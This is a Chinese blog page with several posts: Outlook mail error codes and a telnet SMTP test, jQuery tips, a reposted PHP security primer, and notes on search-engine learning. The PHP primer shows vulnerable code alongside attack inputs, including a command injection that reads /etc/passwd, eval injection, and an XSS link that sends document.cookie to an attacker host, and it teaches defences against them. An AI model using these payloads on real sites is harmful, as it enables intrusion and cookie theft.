手机浏览 RSS 2.0 订阅 膘叔的简单人生 , 腾讯云RDS购买 | 超便宜的Vultr , 注册 | 登陆
浏览模式: 标准 | 列表全部文章

163邮箱的一些技巧

做WEB开发的,总不可避免的会利用程序来发邮件。。
而163的邮局相对的比较完善,他提供了一些错误代码和一些其他帮助。
你看:163邮箱OutLook错误号解析一文中,就提到了很多代码,他增强了你在开发中的纠错能力:

一般常见错误代码
0x800C0131 可能是 Folders.dbx 档案属性错误或损坏.
0x800CCC00 身份验证(Authentication)未载入
0x800CCC01 认证(Certificate)内容错误
0x800CCC02 认证日期错误
0x800CCC03 使用者已联机
0x800CCC05 未联机到服务器
0x800CCC0A 邮件下载未完成
0x800CCC0B 服务器忙碌中
0x800CCC0D 找不到主机(检查你的SMTP服务器是不是设错)
0x800CCC0E 联机到服务器失败,无法与主机建立联机。等一段时间再试。
0x800CCC0F 服务器结束联机(对方服务器负荷过重)
0x800CCC10 服务器无法辨认此邮件地址
0x800CCC11 服务器无法辨认的 Mailing list
0x800CCC12 无法传送 Winsock request
0x800CCC13 无法接收 Winsock reply
0x800CCC14 无法起始 Winsock
0x800CCC15 无法开启 Windows Socket
0x800CCC16 无法辨认使用者账号,使用者账号错误
0x800CCC17 使用者中断操作
0x800CCC18 登入失败(例如:不需要安全密码认证登入,但却设了安全密码认证登入)
0x800CCC19 作业逾时
0x800CCC1A 无法以 SSL 建立联机
   
Winsock错误
0x800CCC40 Network subsystem 无法使用
0x800CCC41 Windows Sockets 不支持此应用程序
0x800CCC43 Bad address.
0x800CCC44 Windows Sockets 无法加载
0x800CCC45 Operation now in progress..
   
SMTP错误
0x800CCC60 不合法的回应
0x800CCC61 不明的错误代码
0x800CCC62 收到语法错误
0x800CCC63 语法参数不正确
0x800CCC64 指令不完整
0x800CCC65 不正确的指令序列
0x800CCC66 指令不完整
0x800CCC67 没有这个指令
0x800CCC68 邮件信箱被锁住或忙碌中
0x800CCC69 找不到邮件信箱
0x800CCC6A 处理要求错误
0x800CCC6B 邮件信箱不在此服务器上
0x800CCC6C 已无空间储存邮件
0x800CCC6D 已超过限制的储存容量上限
0x800CCC6E 不合法的邮件信箱名称
0x800CCC6F Transaction error,可能是服务器不接受你的邮件,请跟你的 ISP 联络。
0x800CCC78 邮件地址不正确,收件者被服务器拒绝,在属性里选中“我的服务器需要身份验证”即可。
0x800CCC79 Relay Denied:Outlook Express 的 SMTP 设定不正确,在属性里选中“我的服务器需要身份验证”即可。
0x800CCC7A 没有指定寄件者
0x800CCC7B 没有指定收件者
   
POP3错误
0x800CCC90 检查是否有使用该服务器的权限。或是否设了安全密码认证登入
0x800CCC91 使用者名称错误或找不到此使用者
0x800CCC92 账号、密码错误,请核实帐号和密码的输入是否正确。
0x800CCC93 无法解释响应
0x800CCC94 需要指令
0x800CCC95 服务器上已无邮件
0x800CCC96 没有邮件标记为要下载
0x800CCC97 Message ID 超出范围
   
NNTP错误  
0x800CCCA0 新闻服务器响应错误,可能你没有拥有可使用该服务器的权限。
0x800CCCA1 读取新闻群组失败
0x800CCCA2 要求服务器邮件清单失败
0x800CCCA3 无法显示清单
0x800CCCA4 无法开启群组
0x800CCCA5 服务器无此群组
0x800CCCA6 邮件不在服务器上
0x800CCCA7 找不到件标题
0x800CCCA8 找不到邮件本文
0x800CCCA9 无法发布到服务器上
0x800CCCAA 无法开启下封邮件
0x800CCCAB 无法显示日期
0x800CCCAC 无法显示标题
0x800CCCAD 无法显示 MIME 标题
0x800CCCAE 使用者名称或密码不正确
   
RAS错误
0x800CCCC2 未安装拨号网络
0x800CCCC3 找不到拨号网络
0x800CCCC4 拨号网络错误
0x800CCCC5 Connectoid 坏或遗失
0x800CCCC6 取得拨号设定时错误
   
IMAP错误
0x800CCCD1 登入失败
0x800CCCD2 Message tagged
0x800CCCD3 Invalid response to request.
0x800CCCD4 语法错误
0x800CCCD5 不是 IMAP 服务器
0x800CCCD6 Buffer 已超过上限
0x800CCCD7 Recovery error
0x800CCCD8 数据不完整
0x800CCCD9 联机被拒
0x800CCCDA 不明的回应
0x800CCCDB User ID 已更改
0x800CCCDC User ID 指令失败
0x800CCCDD Unexpected disconnect
0x800CCCDE Invalid server state
0x800CCCDF 无法认证客户端


而对于那些喜欢手动查看从邮件服务器到网易MX服务器的SMTP的记录的朋友,163邮箱的帮助也做了介绍:

  利用telnet手工模拟一次smtp会话过程,能提供许多有用的信息,从而帮助我们迅速定位您的问题。下面这个手工smtp会话测试过程可以在多个操作系统下运行,包括Windows、Unix和Linux。
2nn开头的返回码,表示会话是正常的;而5nn或者4nn开头的返回码则表示有错误发生。

  利用telnet来模拟一次完整的发信,下面是具体步骤:
·打开一个命令窗口,键入:telnet 163mx01.mxmail.netease.com 25,这条命令将建立一个到我们163邮件服务器的连接;
·键入:HELO yourdomain.com 这里的yourdomain.com指您的域名;
·键入:MAIL FROM:< you@yourdomain.com >(邮箱名需要用<>括起来),这里的you@yourdomain.com指您们域的一个邮箱名;
·键入:RCPT TO:< postmaster >(邮箱名需要用<>括起来),这将发信到我们的postmaster邮箱;
·键入:DATA;
·输入邮件的信头和正文; 
Received: (from you@yourdomain.com) by yourdomain.com 
FROM:< you@yourdomain.com>(无需空格)
TO:< postmaster>(无需空格)
SUBJECT: yourdomain.com to netease
(空行)
Hi!
It's from yourdomain.com. Just a test.Bye.
·新起一个空行,键入:. 然后按回车,这将结束整封信,并发送给服务器。

  范例(模拟从126.com服务器向网易163.com发起smtp会话)如下图:

大小: 54.64 K
尺寸: 500 x 346
浏览: 1578 次
点击打开新窗口浏览全图


  当然:该测试过程必须在发信服务器上进行。

jQuery选择器?

现在javascript的框架越来越多,但被人关注的也就那么几个,这几天博客园上也有不少文章来介绍和学习jQuery,有司徒正美的深入jQuery源码系列,也有很多人写的基础学习,当然也有应用类的,插件类的。。formValidator好象首发就是在博客园哦。

昨天在博客园上看到有人在写着jQuery的选择器的文章,地址为:http://www.cnblogs.com/bynet/archive/2009/11/30/1613635.html,其实,在网上有这么一个页面,专门用来让你测试的,http://codylindley.com/jqueryselectors/,它非常酷,而且能够在线免费使用,当然你也能下来到本地离线使用。这个测试页面包含复杂的HTML组合字段,然后你能尝试预定义使用各种jQuery选择器。如果这还不够你也可以自定义选择器。你还可以尝试着一些优化代码。。。

帕兰映像就收集了一些优化的代码:http://paranimage.com/14-tips-to-improve-jquery-code/
有14条哦,建议去原页面查看。我这里只列一下标题

  1. 测试并提升你的jQuery选择器水平

  2. 测试jQuery包装集是否包含某些元素

  3. 从jquery.org读取jQuery最新版本

  4. 存储数据

  5. jQuery手册常备身边

  6. 在FireBug控制台记录jQuery

  7. 尽可能使用ID选择器

  8. 善于利用jQuery链

  9. 绑定jQuery函数到$(window).load事件

  10. 使用jQuery链来限定选择器,让你的代码更简洁更优雅

  11. 使用回调函数同步效果

  12. 学会使用自定义选择器

  13. 预加载图片

  14. 将你的代码测试完好

好象,帕兰也是从别的地方贴过来的
英文原文:More jQuery and General Javascript Tips to Improve Your Code
中文译文:了解更多jQuery技巧来提高你的代码/彬GO

PHP漏洞全解【转】

说是全解,其实倒更不如说是一些介绍。虽然没有什么明确的解决方案,但是了解一下,对于自己的代码也可以有针对性的防范。。。内容还是有点乱,还有一点重复内容,估计原作者也只是做了一个集中吧?
而且对于6往后的内容,并没有加入。。。。不知道以后会不会加上

原文如下:
PHP网页的安全性问题
针对PHP的网站主要存在下面几种攻击方式:
1.命令注入(Command Injection)
2.eval注入(Eval Injection)
3.客户端脚本攻击(Script Insertion)
4.跨网站脚本攻击(Cross Site Scripting, XSS)
5.SQL注入攻击(SQL injection)
6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
7.Session 会话劫持(Session Hijacking)
8.Session 固定攻击(Session Fixation)
9.HTTP响应拆分攻击(HTTP Response Splitting)
10.文件上传漏洞(File Upload Attack)
11.目录穿越漏洞(Directory Traversal)
12.远程文件包含攻击(Remote Inclusion)
13.动态函数注入攻击(Dynamic Variable Evaluation)
14.URL攻击(URL attack)
15.表单提交欺骗攻击(Spoofed Form Submissions)
16.HTTP请求欺骗攻击(Spoofed HTTP Requests)

几个重要的php.ini选项
Register Globals
php>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals的设定为 On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患.
例1:
//check_admin()用于检查当前用户权限,如果是admin设置$is_admin变量为true,然后下面判断此变量是否为true,然后执行管理的一些操作
//ex1.php
<?php
if (check_admin())
{
         $is_admin = true;
}
if ($is_admin)
{
         do_something();
}
?>
这一段代码没有将$is_admin事先初始化为Flase,如果register_globals为On,那么我们直接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过check_admin()的验证

例2:
//ex2.php
<?php
if (isset($_SESSION["username"]))
{
         do_something();
}
else
{
         echo "您尚未登录!";
}
?>
当register_globals=On时,我们提交http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限
所以不管register_globals为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变量要初始化

safe_mode
安全模式,PHP用来限制文档的存取.限制环境变量的存取,控制外部程序的执行.启用安全模式必须设置php.ini中的safe_mode = On
1.限制文件存取
safe_mode_include_dir = "/path1:/path2:/path3"
不同的文件夹用冒号隔开
2.限制环境变量的存取
safe_mode_allowed_env_vars = string
指定PHP程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个选项的值为空时,那么php可以改变任何环境变量
safe_mode_protected_env_vars = string
用来指定php程序不可改变的环境变量的前缀
3.限制外部程序的执行
safe_mode_exec_dir = string
此选项指定的文件夹路径影响system.exec.popen.passthru,不影响shell_exec和"` `".
disable_functions = string
不同的函数名称用逗号隔开,此选项不受安全模式影响

magic quotes
用来让php程序的输入信息自动转义,所有的单引号("'"),双引号("""),反斜杠("\")和空字符(NULL),都自动被加上反斜杠进行转义
magic_quotes_gpc = On 用来设置magic quotes 为On,它会影响HTTP请求的数据(GET.POST.Cookies)
程序员也可以使用addslashes来转义提交的HTTP请求数据,或者用stripslashes来删除转义

命令注入攻击
PHP中可以使用下列5个函数来执行外部的应用程序或函数
system.exec.passthru.shell_exec.``(与shell_exec功能相同)
函数原型
string system(string command, int &return_var)
command 要执行的命令
return_var 存放执行命令的执行后的状态值
string exec (string command, array &output, int &return_var)
command 要执行的命令
output 获得执行命令输出的每一行字符串
return_var 存放执行命令后的状态值
void passthru (string command, int &return_var)
command 要执行的命令
return_var 存放执行命令后的状态值
string shell_exec (string command)
command 要执行的命令

漏洞实例
例1:
//ex1.php
<?php
$dir = $_GET["dir"];
if (isset($dir))
{
         echo "<pre>";
         system("ls -al ".$dir);
         echo "</pre>";
}
?>
我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd
提交以后,命令变成了 system("ls -al | cat /etc/passwd");


eval注入攻击
eval函数将输入的字符串参数当作PHP程序代码来执行
函数原型:
mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候
//ex2.php
<?php
$var = "var";
if (isset($_GET["arg"]))
{
         $arg = $_GET["arg"];
         eval("\$var = $arg;");
         echo "\$var =".$var;
}
?>
当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
动态函数
<?php
func A()
{
         dosomething();
}
func B()
{
         dosomething();
}
if (isset($_GET["func"]))
{
         $myfunc = $_GET["func"];
         echo $myfunc();
}
?>
程序员原意是想动态调用A和B函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生


防范方法
1.尽量不要执行外部命令
2.使用自定义函数或函数库来替代外部命令的功能
3.使用escapeshellarg函数来处理命令参数
4.使用safe_mode_exec_dir指定可执行文件的路径
esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号"'",替换成"\'",双引号""",替换成"\"",分号";"替换成"\;"
用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内
safe_mode = On
safe_mode_exec_di r= /usr/local/php/bin/



客户端脚本植入
客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击.
可以被用作脚本植入的HTML标签一般包括以下几种:
1.<script>标签标记的javascript和vbscript等页面脚本程序.在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径
2.<object>标签标记的对象.这些对象是java applet.多媒体文件和ActiveX控件等.通常在data属性内指定对象的URL路径
3.<embed>标签标记的对象.这些对象是多媒体文件,例如:swf文件.通常在src属性内指定对象的URL路径
4.<applet>标签标记的对象.这些对象是java applet,通常在codebase属性内指定对象的URL路径
5.<form>标签标记的对象.通常在action属性内指定要处理表单数据的web应用程序的URL路径

客户端脚本植入的攻击步骤
1.攻击者注册普通用户后登陆网站
2.打开留言页面,插入攻击的js代码
3.其他用户登录网站(包括管理员),浏览此留言的内容
4.隐藏在留言内容中的js代码被执行,攻击成功
实例
数据库
Create TABLE `postmessage` (
   `id` int(11) NOT NULL auto_increment,
   `subject` varchar(60) NOT NULL default '',
   `name` varchar(40) NOT NULL default '',
   `email` varchar(25) NOT NULL default '',
   `question` mediumtext NOT NULL,
   `postdate` datetime NOT NULL default '0000-00-00 00:00:00',
   PRIMARY KEY   (`id`)
) ENGINE=MyISAM   DEFAULT CHARSET=gb2312 COMMENT='使用者的留言' AUTO_INCREMENT=69 ;
//add.php 插入留言
//list.php 留言列表
//show.php 显示留言
浏览此留言的时候会执行js脚本
插入 <script>while(1){windows.open();}</script> 无限弹框
插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面
或者使用其他自行构造的js代码进行攻击

防范的方法
一般使用htmlspecialchars函数来将特殊字符转换成HTML编码
函数原型
string htmlspecialchars (string string, int quote_style, string charset)
string 是要编码的字符串
quote_style 可选,值可为ENT_COMPAT ENT_QUOTES ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号.ENT_QUOTES,表示双引号和单引号都要转 换.ENT_NOQUOTES,表示双引号和单引号都不转换
charset 可选,表示使用的字符集
函数会将下列特殊字符转换成html编码:
& ----> &
" ----> "
' ----> '
< ----> <
> ----> >
把show.php的第98行改成
<?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>


然后再查看插入js的漏洞页面
xss跨站脚本攻击
XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS
跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限.
跨站脚本攻击的一般步骤:
1.攻击者以某种方式发送xss的http链接给目标用户
2.目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接
3.网站执行了此xss攻击脚本
4.目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
5.攻击者使用目标用户的信息登录网站,完成攻击
当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似 http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户cookies值
防范方法:
利用htmlspecialchars函数将特殊字符转换成HTML编码
函数原型
string htmlspecialchars (string string, int quote_style, string charset)
string 是要编码的字符串
quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不


$_SERVER["PHP_SELF"]变量的跨站

在某个表单中,如果提交参数给自己,会用这样的语句
<form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST">
......
</form>
$_SERVER["PHP_SELF"]变量的值为当前页面名称
例:
http://www.sectop.com/get.php
get.php中上述的表单
那么我们提交
http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>
那么表单变成
<form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
跨站脚本被插进去了
防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用
<form action="" method="post">
这样直接避免了$_SERVER["PHP_SELF"]变量被跨站



SQL注入攻击
SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改变原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击.
SQL注入攻击的一般步骤:
1.攻击者访问有SQL注入漏洞的网站,寻找注入点
2.攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句
3.新的sql语句被提交到数据库中进行处理
4.数据库执行了新的SQL语句,引发SQL注入攻击

原文地址:http://hi.baidu.com/isbx/blog/item/80ea6c22ea1efaae4723e838.html

小意外与用户行为分析

以前的博客文章里介绍了什么是行为:

http://www.neatstudio.com/show-686-1.shtml
  1. 行为/路径:在一个访问过程中,客户访问过的所有页面的轨迹称为路径,或称为行为。  
  2.   
  3. 特定行为:由用户自行定义的行为,包含若干行为步骤,其中行为步骤不受限制,即可以任意设定行为步骤。进而分析出满足设定行为的发生次数及各个步骤之间的转化率。  
  4.   
  5. 特定行为转化率:在特定行为中,两个步骤之间的转化率。  
  6.   
  7. 行为入口:客户开始访问网站的第一个页面。在Web-IA中,根据入口给出典型行为分析。  
  8.   
  9. 行为出口:客户访问网站的最后一个页面。在Web-IA中,根据出口给出典型行为分析。  

而行为分析也是做网站的所非常关注的。每年艾瑞斯咨询都会公布一些网上的用户的行为分析报告,这些都是参考资料啊

而我这次所说的,其实只是一个意外,然后引发出来的:用户其实很笨。这句话我不记得是史玉柱说的还是谁说的了。

昨天的事情其实是这样的。我打开一部片子,不知道按了什么快捷键,结果,动画片成中文的声音了。说实话,真的很意外,我发现切换声道后又有英文了。你们看到我这样会认为我的操作很奇怪,但事实上一点也不奇怪。自从播放器越来越高极后,字幕也成了外挂后,我真的忘记可以用声道来切换语音了。再加上也不是每部电影都会有多语音的。慢慢的也就忘了这个功能了。。。。

天涯,这么大的网站,贴子的内容页样式几乎没变过,为什么我不知道,我只知道,用户很笨,因为就怕一变之后找不到操作了。

做网站的都面临这样的情况,网站一改版,就要面临用户习惯的改变:平时这个连接都在左边的现在提上去一点点,我找不到了。。。

以前有一个网站可以提供用户点击热区的。。。现在找不到那个网站了。意外啊。

其实我只是乱说,莫介意

 

【转】一个月的学习搜索引擎心得

搜索,一直是一个比较大型的工程,效率和匹配就是众人所关心的。而对于搜索引擎来说,数据总量、重复度、抓取等,又是一项复杂的工程

以下来自博客园,纯属参考。。。
原文如下:

一晃时间就过去了一个月的时间了,从找到工作到现在也有一个月的时间了。

回顾这一个月的时间,感觉学习了一些东西,但是没有到理想的效率。

从10月25日差不多正式的开始了解搜索引擎算起,到11月25日,列举一下完成事情的内容,以后这些内容的记录要更频繁一些,也需要分享些经验。东西堆在一起之后就不太想记录下来了。

10月25日 - 11月6日, 看了一下Managing Gigabytes(以下简称MG)这本书,感觉还是很不错的一本书,翻译版叫做《深入搜索引擎》,作者是新西兰的一位教授,属于比较严肃的类型,但是对 知识点讲的还是非常的细,特别是文本压缩,索引,查询,索引构造讲得不错,都是比较传统的方法,最先进的一些方法没有怎么涉及,怪不得是作为 Stanford的教科书和参考书。

11月6日 - 11月12日,lw告诉我,需要下载百度知道,和天涯问答的内容,这样可以构建自己的语料库,程序语言就用perl吧。

    于是花了两天来看了下perl,一个非常好用的工具,字符串处理超方便,就是效率不怎么样,可能是我太菜了的原因吧,呵呵。

    下载网页的内容无外乎就是做一个简单的爬虫,MG书中没有讲,又去网上查了一些资料,简单的爬虫设计其实挺简单,不停的分析web页面中的html含有的链接,把需要的页面写到文件里面去,这块使用perl天生的正则表达式非常的容易,代码也很短。

    百度的网页最好下载,甚至连正则表达式都不需要,因为百度知道的链接是如 http://zhidao.baidu.com/question/126947921.html ,把.html之前的9维数字进行枚举就可以了。

    天涯问答的稍微复杂一点,主要需要分析链接的类型,如果是如同

    http://wenda.tianya.cn/wenda/thread?tid=40734b71c6b7a07e这样的形式,也就是中间含有thread的,则为问题

    如果是

    http://wenda.tianya.cn/wenda/label?lid=68aa0de477338ddc& clk=cts_ls,也就是中间含有label的,则为一类问题的集合, 把集合想象为树的节点,问题想象为树的叶子,进行宽度优先搜索或者深度优先搜索就可以了。

    如果需要perl源程序的可以跟我联系。

11月12日 - 11月22日, 看了一些Information Retrieve这本书,看了其中的一些内容,好些不太懂,看英文还是有点费力-_-,这本书写得我感觉比MG要轻松易懂一点,主要看了看 Clustering(聚类)和Classification(分类)的方法,主要有kNN与向量法。

    学会了用perl处理下载下来的网页,将无用的信息删除,比如一篇内容就剩下分类和主要的文本内容,html标签和一些无用的东西都删除了。

    学会了基本的分词算法,最简单的分词算法是正向,反向,最大匹配法,在这基础上有一个叫做双向最大匹配法,其实就是在正向和反向分词做完之后选择一个结果更好的,可以认为留下的单字越少越好,也可以认为分出的词数越少越好,分词后的结果可能是下面的

(不然)\引用\起来\必然\要\出现\牵强\附会\(的)\

现象\
造成\引用\(不得)\体\
今天\(来)\老师\(把)\(这)\一组\诗句\奉献\(给)\(你)\
希望\(你)\(能)\收录\(在)\(自己)\(的)\文件\夹\中\
梅须逊雪三分白\
雪却输梅一段香\
卢\梅\坡\
雪\似\梅花\
梅花\似\雪\
似和不似都奇艳\

    括号括出来的是停用词,看起来效果还是不错把,呵呵。 另外对诗句的处理就是用了一些小小的trick,可能造成的错误很多,仅仅是做个实验。

11月24日 - 11月28日 这几天不幸感冒,今天才算缓过气来,准备一下计划吧。

另外公布一个我注册的google code地址作为我的第一篇日志的总结,如果有需要的朋友可以任意使用里面的内容,包括了我的代码和一些我找到的参考资料,可以无责任的使用他们,另外如果有朋友想要扩充这个知识库,可以联系一下我

http://code.google.com/p/mynlp/ 

原文地址:http://www.cnblogs.com/LeftNotEasy/archive/2009/11/27/1612144.html